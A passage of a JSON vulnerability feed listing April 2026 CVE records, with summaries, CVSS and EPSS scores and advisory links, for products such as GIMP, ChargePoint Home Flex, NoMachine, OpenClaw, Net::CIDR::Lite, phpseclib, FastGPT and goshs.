ZDI-CAN-25720.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00046,"ranking_epss":0.14093,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-257/"],"published_time":"2026-04-11T01:16:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5496","summary":"Labcenter Electronics Proteus PDSPRJ File Parsing Type Confusion Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of PDSPRJ files. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-25717.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00046,"ranking_epss":0.14093,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-254/"],"published_time":"2026-04-11T01:16:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4154","summary":"GIMP XPM File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of XPM files. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28901.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00063,"ranking_epss":0.19465,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gitlab.gnome.org/GNOME/gimp/-/commit/2e7ed91793792d9e980b2df4c829e9aa60459253","https://www.zerodayinitiative.com/advisories/ZDI-26-221/"],"published_time":"2026-04-11T01:16:17","vendor":"gimp","product":"gimp","version":null},{"cve_id":"CVE-2026-4155","summary":"ChargePoint Home Flex Inclusion of Sensitive Information in Source Code Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of ChargePoint Home Flex charging stations. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the genpw script. The issue results from the inclusion of a secret cryptographic seed value within the script. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-26340.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00238,"ranking_epss":0.46874,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-195/"],"published_time":"2026-04-11T01:16:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4156","summary":"ChargePoint Home Flex OCPP getpreq Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of ChargePoint Home Flex EV chargers. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of OCPP messages. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-26339.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00072,"ranking_epss":0.21958,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-196/"],"published_time":"2026-04-11T01:16:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4157","summary":"ChargePoint Home Flex revssh Service Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of ChargePoint Home Flex devices. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of OCPP messages. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-26338.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00194,"ranking_epss":0.4135,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-197/"],"published_time":"2026-04-11T01:16:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4158","summary":"KeePassXC OpenSSL Configuration Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of KeePassXC. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the configuration of OpenSSL. The product loads configuration from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of KeePassXC when run by a target user on the system. Was ZDI-CAN-29156.","cvss":7.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.3,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02584,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/keepassxreboot/keepassxc/security/advisories/GHSA-4gr2-cr97-q9fx","https://www.zerodayinitiative.com/advisories/ZDI-26-215/"],"published_time":"2026-04-11T01:16:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5053","summary":"NoMachine External Control of File Path Arbitrary File Deletion Vulnerability. This vulnerability allows local attackers to delete arbitrary files on affected installations of NoMachine. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the handling of environment variables. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to delete files in the context of root. Was ZDI-CAN-28644.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00015,"ranking_epss":0.02951,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-247/"],"published_time":"2026-04-11T01:16:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5054","summary":"NoMachine External Control of File Path Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the handling of command line parameters. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root. Was ZDI-CAN-28630.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00015,"ranking_epss":0.02856,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-248/"],"published_time":"2026-04-11T01:16:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-3691","summary":"OpenClaw Client PKCE Verifier Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose stored credentials on affected installations of OpenClaw. User interaction is required to exploit this vulnerability in that the target must initiate an OAuth authorization flow.\n\nThe specific flaw exists within the implementation of OAuth authorization. The issue results from the exposure of sensitive data in the authorization URL query string. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-29381.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00061,"ranking_epss":0.19083,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/security/advisories/GHSA-6g25-pc82-vfwp","https://www.zerodayinitiative.com/advisories/ZDI-26-229/"],"published_time":"2026-04-11T01:16:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40354","summary":"Flatpak xdg-desktop-portal before 1.20.4 and 1.21.x before 1.21.1 allows any Flatpak app to trash any file in the host context via a symlink attack on g_file_trash.","cvss":2.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.9,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02526,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/flatpak/xdg-desktop-portal/releases/tag/1.20.4","https://github.com/flatpak/xdg-desktop-portal/releases/tag/1.21.1","https://github.com/flatpak/xdg-desktop-portal/security/advisories/GHSA-rqr9-jwwf-wxgj","https://www.openwall.com/lists/oss-security/2026/04/10/14"],"published_time":"2026-04-11T01:16:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4149","summary":"Sonos Era 300 SMB Response Out-Of-Bounds Access Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Sonos Era 300. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of the DataOffset field within SMB responses. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the kernel. Was ZDI-CAN-28345.","cvss":10.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":10.0,"cvss_v4":null,"epss":0.01272,"ranking_epss":0.79522,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-192/"],"published_time":"2026-04-11T01:16:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4150","summary":"GIMP PSD File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of PSD files. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28807.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00063,"ranking_epss":0.19465,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gitlab.gnome.org/GNOME/gimp/-/commit/00afdabdadeb5457fd897878b1e5aebc3780af10","https://www.zerodayinitiative.com/advisories/ZDI-26-217/"],"published_time":"2026-04-11T01:16:16","vendor":"gimp","product":"gimp","version":null},{"cve_id":"CVE-2026-4151","summary":"GIMP ANI File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of ANI files. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28813.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00063,"ranking_epss":0.19465,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gitlab.gnome.org/GNOME/gimp/-/commit/09e5459de913172fc51da3bd6b6adc533acd368e","https://www.zerodayinitiative.com/advisories/ZDI-26-218/"],"published_time":"2026-04-11T01:16:16","vendor":"gimp","product":"gimp","version":null},{"cve_id":"CVE-2026-4152","summary":"GIMP JP2 File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of JP2 files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28863.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00058,"ranking_epss":0.17923,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gitlab.gnome.org/GNOME/gimp/-/commit/f64c9c23ba3c37dc7b875a9fb477c23953b4666e","https://www.zerodayinitiative.com/advisories/ZDI-26-219/"],"published_time":"2026-04-11T01:16:16","vendor":"gimp","product":"gimp","version":null},{"cve_id":"CVE-2026-4153","summary":"GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of PSP files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28874.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00058,"ranking_epss":0.17923,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gitlab.gnome.org/GNOME/gimp/-/commit/98cb1371fd4e22cca75017ea3252dc32fc218712","https://www.zerodayinitiative.com/advisories/ZDI-26-220/"],"published_time":"2026-04-11T01:16:16","vendor":"gimp","product":"gimp","version":null},{"cve_id":"CVE-2026-3689","summary":"OpenClaw Canvas Path Traversal Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of OpenClaw. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of the path parameters provided to the canvas gateway endpoint. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose information in the context of the service account. Was ZDI-CAN-29312.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00276,"ranking_epss":0.51021,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/security/advisories/GHSA-jq4x-98m3-ggq6","https://www.zerodayinitiative.com/advisories/ZDI-26-227/"],"published_time":"2026-04-11T01:16:15","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-3690","summary":"OpenClaw Canvas Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of OpenClaw. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of the the authentication function for canvas endpoints. The issue results from improper implementation of authentication. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-29311.","cvss":7.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.4,"cvss_v4":null,"epss":0.00135,"ranking_epss":0.33179,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/security/advisories/GHSA-vvjh-f6p9-5vcf","https://www.zerodayinitiative.com/advisories/ZDI-26-228/"],"published_time":"2026-04-11T01:16:15","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33118","summary":"Microsoft Edge (Chromium-based) Spoofing Vulnerability","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00064,"ranking_epss":0.1971,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33118"],"published_time":"2026-04-10T22:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33119","summary":"User interface (ui) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.00061,"ranking_epss":0.18985,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33119"],"published_time":"2026-04-10T22:16:21","vendor":"microsoft","product":"edge","version":null},{"cve_id":"CVE-2026-40198","summary":"Net::CIDR::Lite versions before 0.23 for Perl does not validate IPv6 group count, which may allow IP ACL bypass.\n\n_pack_ipv6() does not check that uncompressed IPv6 addresses (without ::) have exactly 8 hex groups. Inputs like \"abcd\", \"1:2:3\", or \"1:2:3:4:5:6:7\" are accepted and produce packed values of wrong length (3, 7, or 15 bytes instead of 17).\n\nThe packed values are used internally for mask and comparison operations. find() and bin_find() use Perl string comparison (lt/gt) on these values, and comparing strings of different lengths gives wrong results. This can cause find() to incorrectly report an address as inside or outside a range.\n\nExample:\n\n  my $cidr = Net::CIDR::Lite->new(\"::/8\");\n  $cidr->find(\"1:2:3\");  # invalid input, incorrectly returns true\n\nThis is the same class of input validation issue as CVE-2021-47154 (IPv4 leading zeros) previously fixed in this module.\n\nSee also CVE-2026-40199, a related issue in the same function affecting IPv4 mapped IPv6 addresses.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.0004,"ranking_epss":0.12143,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/stigtsp/Net-CIDR-Lite/commit/25d65f85dbe4885959a10471725ec9d250a589c3.patch","https://metacpan.org/release/STIGTSP/Net-CIDR-Lite-0.23/changes","https://www.cve.org/CVERecord?id=CVE-2026-40199"],"published_time":"2026-04-10T22:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40199","summary":"Net::CIDR::Lite versions before 0.23 for Perl mishandles IPv4 mapped IPv6 addresses, which may allow IP ACL bypass.\n\n_pack_ipv6() includes the sentinel byte from _pack_ipv4() when building the packed representation of IPv4 mapped addresses like ::ffff:192.168.1.1. This produces an 18 byte value instead of 17 bytes, misaligning the IPv4 part of the address.\n\nThe wrong length causes incorrect results in mask operations (bitwise AND truncates to the shorter operand) and in find() / bin_find() which use Perl string comparison (lt/gt). This can cause find() to incorrectly match or miss addresses.\n\nExample:\n\n  my $cidr = Net::CIDR::Lite->new(\"::ffff:192.168.1.0/120\");\n  $cidr->find(\"::ffff:192.168.2.0\");  # incorrectly returns true\n\nThis is triggered by valid RFC 4291 IPv4 mapped addresses (::ffff:x.x.x.x).\n\nSee also CVE-2026-40198, a related issue in the same function affecting malformed IPv6 addresses.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00027,"ranking_epss":0.07592,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/stigtsp/Net-CIDR-Lite/commit/b7166b1fa17b3b14b4c795ace5b3fbf71a0bd04a.patch","https://metacpan.org/release/STIGTSP/Net-CIDR-Lite-0.23/changes","https://www.cve.org/CVERecord?id=CVE-2026-40198"],"published_time":"2026-04-10T22:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5724","summary":"The frontend gRPC server's streaming interceptor chain did not include the authorization interceptor. When a ClaimMapper and Authorizer are configured, unary RPCs enforce authentication and authorization, but the streaming AdminService/StreamWorkflowReplicationMessages endpoint accepted requests without credentials. This endpoint is registered on the same port as WorkflowService and cannot be disabled independently. An attacker with network access to the frontend port could open the replication stream without authentication. Data exfiltration is possible, but  only when a configured replication target is correctly configured and the attacker has knowledge of the cluster configuration, as the history service validates cluster IDs and peer membership before returning replication data.\n\n\n\n\nTemporal Cloud is not affected.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.3,"epss":0.001,"ranking_epss":0.27649,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/temporalio/temporal/releases/tag/v1.28.4","https://github.com/temporalio/temporal/releases/tag/v1.29.6","https://github.com/temporalio/temporal/releases/tag/v1.30.4"],"published_time":"2026-04-10T21:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40191","summary":"ClearanceKit intercepts file-system access events on macOS and enforces per-process access policies. Prior to 5.0.4-beta-1f46165,  ClearanceKit's Endpoint Security event handler only checked the source path of dual-path file operations against File Access Authorization (FAA) rules and App Jail policies. The destination path was ignored entirely. This allowed any local process to bypass file-access protection by using rename, link, copyfile, exchangedata, or clone operations to place or replace files inside protected directories. This vulnerability is fixed in 5.0.4-beta-1f46165.","cvss":6.8,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.8,"epss":0.00013,"ranking_epss":0.02107,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/craigjbass/clearancekit/releases/tag/v5.0.4-1f46165","https://github.com/craigjbass/clearancekit/security/advisories/GHSA-92f3-38m7-579h"],"published_time":"2026-04-10T21:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40194","summary":"phpseclib is a PHP secure communications library. Prior to 3.0.51, 2.0.53, and 1.0.28, phpseclib\\Net\\SSH2::get_binary_packet() uses PHP's != operator to compare a received SSH packet HMAC against the locally computed HMAC. != on equal-length binary strings in PHP uses memcmp(), which short-circuits on the first differing byte. This is a real variable-time comparison (CWE-208), proven by scaling benchmarks. This vulnerability is fixed in 3.0.51, 2.0.53, and 1.0.28.","cvss":3.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":3.7,"cvss_v4":null,"epss":0.0001,"ranking_epss":0.00992,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/phpseclib/phpseclib/commit/ffe48b6b1b1af6963327f0a5330e3aa004a194ac","https://github.com/phpseclib/phpseclib/releases/tag/1.0.28","https://github.com/phpseclib/phpseclib/releases/tag/2.0.53","https://github.com/phpseclib/phpseclib/releases/tag/3.0.51","https://github.com/phpseclib/phpseclib/security/advisories/GHSA-r854-jrxh-36qx","https://github.com/phpseclib/phpseclib/security/advisories/GHSA-r854-jrxh-36qx"],"published_time":"2026-04-10T21:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40242","summary":"Arcane is an interface for managing Docker containers, images, networks, and volumes. Prior to 1.17.3, the /api/templates/fetch endpoint accepts a caller-supplied url parameter and performs a server-side HTTP GET request to that URL without authentication and without URL scheme or host validation. The server's response is returned directly to the caller. type. This constitutes an unauthenticated SSRF vulnerability affecting any publicly reachable Arcane instance. This vulnerability is fixed in 1.17.3.","cvss":7.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":null,"epss":0.00018,"ranking_epss":0.04533,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/getarcaneapp/arcane/releases/tag/v1.17.3","https://github.com/getarcaneapp/arcane/security/advisories/GHSA-ff24-4prj-gpmj","https://github.com/getarcaneapp/arcane/security/advisories/GHSA-ff24-4prj-gpmj"],"published_time":"2026-04-10T21:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40252","summary":"FastGPT is an AI Agent building platform. Prior to 4.14.10.4, Broken Access Control vulnerability (IDOR/BOLA) allows any authenticated team to access and execute applications belonging to other teams by supplying a foreign appId. While the API correctly validates the team token, it does not verify that the requested application belongs to the authenticated team. This leads to cross-tenant data exposure and unauthorized execution of private AI workflows. This vulnerability is fixed in 4.14.10.4.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":0.00057,"ranking_epss":0.17791,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/labring/FastGPT/releases/tag/v4.14.10.4","https://github.com/labring/FastGPT/security/advisories/GHSA-gc8m-w37w-24hw"],"published_time":"2026-04-10T21:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40190","summary":"LangSmith Client SDKs provide SDK's for interacting with the LangSmith platform. Prior to 0.5.18, the LangSmith JavaScript/TypeScript SDK (langsmith) contains an incomplete prototype pollution fix in its internally vendored lodash set() utility. The baseAssignValue() function only guards against the __proto__ key, but fails to prevent traversal via constructor.prototype. This allows an attacker who controls keys in data processed by the createAnonymizer() API to pollute Object.prototype, affecting all objects in the Node.js process. This vulnerability is fixed in 0.5.18.","cvss":5.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.6,"cvss_v4":null,"epss":0.0004,"ranking_epss":0.11975,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-fw9q-39r9-c252"],"published_time":"2026-04-10T20:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40178","summary":"ajenti.plugin.core defines all necessary core elements to allow Ajenti to run properly. Prior to 0.112, if the 2FA was activated, it was possible during a short moment after the authentication of an user to bypass its authentication. This vulnerability is fixed in 0.112.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":0.00073,"ranking_epss":0.22038,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ajenti/ajenti/security/advisories/GHSA-8647-755q-fw9p"],"published_time":"2026-04-10T20:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40180","summary":"Quarkus OpenAPI Generator is Quarkus' extensions for generation of Rest Clients and server stubs generation. Prior to 2.16.0 and 2.15.0-lts, the unzip() method in ApicurioCodegenWrapper.java extracts ZIP entries without validating that the resolved file path stays within the intended output directory. At line 101, the destination is constructed as new File(toOutputDir, entry.getName()) and the content is written immediately. A malicious ZIP archive containing entries with path traversal sequences (e.g., ../../malicious.java) would write files outside the target directory. This vulnerability is fixed in 2.16.0 and 2.15.0-lts.","cvss":7.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.7,"epss":0.00044,"ranking_epss":0.13258,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/quarkiverse/quarkus-openapi-generator/commit/08b406414ff30ed192e86c7fa924e57565534ff0","https://github.com/quarkiverse/quarkus-openapi-generator/commit/e2a9c629a3df719abc74569a3795c265fd0e1239","https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-jx2w-vp7f-456q","https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-jx2w-vp7f-456q"],"published_time":"2026-04-10T20:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40184","summary":"TREK is a collaborative travel planner. Prior to 2.7.2, TREK served uploaded photos without requiring authentication. This vulnerability is fixed in 2.7.2.","cvss":3.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":3.7,"cvss_v4":null,"epss":0.0005,"ranking_epss":0.15394,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/mauriceboe/TREK/commit/16277a3811a00c2983f7486fee83c112986cb179","https://github.com/mauriceboe/TREK/releases/tag/v2.7.2","https://github.com/mauriceboe/TREK/security/advisories/GHSA-wxx3-84fc-mrx2"],"published_time":"2026-04-10T20:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40185","summary":"TREK is a collaborative travel planner. Prior to 2.7.2, TREK was missing authorization checks on the Immich trip photo management routes. This vulnerability is fixed in 2.7.2.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00027,"ranking_epss":0.07386,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/mauriceboe/TREK/commit/16277a3811a00c2983f7486fee83c112986cb179","https://github.com/mauriceboe/TREK/releases/tag/v2.7.2","https://github.com/mauriceboe/TREK/security/advisories/GHSA-pcr3-6647-jh72"],"published_time":"2026-04-10T20:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40188","summary":"goshs is a SimpleHTTPServer written in Go. From 1.0.7 to before 2.0.0-beta.4, the SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP. This vulnerability is fixed in 2.0.0-beta.4.","cvss":7.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.7,"cvss_v4":null,"epss":0.00025,"ranking_epss":0.06814,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/patrickhener/goshs/commit/141c188ce270ffbec087844a50e5e695b7da7744","https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.4","https://github.com/patrickhener/goshs/security/advisories/GHSA-2943-crp8-38xx","https://github.com/patrickhener/goshs/security/advisories/GHSA-2943-crp8-38xx"],"published_time":"2026-04-10T20:16:23","vendor":"goshs","product":"goshs","version":null},{"cve_id":"CVE-2026-40189","summary":"goshs is a SimpleHTTPServer written in Go. Prior to 2.0.0-beta.4, goshs enforces the documented per-folder .goshs ACL/basic-auth mechanism for directory listings and file reads, but it does not enforce the same authorization checks for state-changing routes. An unauthenticated attacker can upload files with PUT, upload files with multipart POST /upload, create directories with ?mkdir, and delete files with ?delete inside a .goshs-protected directory. By deleting the .goshs file itself, the attacker can remove the folder's auth policy and then access previously protected content without credentials. This results in a critical authorization bypass affecting confidentiality, integrity, and availability. This vulnerability is fixed in 2.0.0-beta.4.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":9.3,"epss":0.00105,"ranking_epss":0.28469,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/patrickhener/goshs/commit/f212c4f4a126556bab008f79758e21a839ef2c0f","https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.4","https://github.com/patrickhener/goshs/security/advisories/GHSA-wvhv-qcqf-f3cx","https://github.com/patrickhener/goshs/security/advisories/GHSA-wvhv-qcqf-f3cx"],"published_time":"2026-04-10T20:16:23","vendor":"goshs","product":"goshs","version":null},{"cve_id":"CVE-2026-39921","summary":"GeoNode versions 4.0 before 4.4.5 and 5.0 before 5.0.2 contain a server-side request forgery vulnerability that allows authenticated users with document upload permissions to trigger arbitrary outbound HTTP requests by providing a malicious URL via the doc_url parameter during document upload. Attackers can supply URLs pointing to internal network targets, loopback addresses, RFC1918 addresses, or cloud metadata services to cause the server to make requests to internal resources without SSRF mitigations such as private IP filtering or redirect 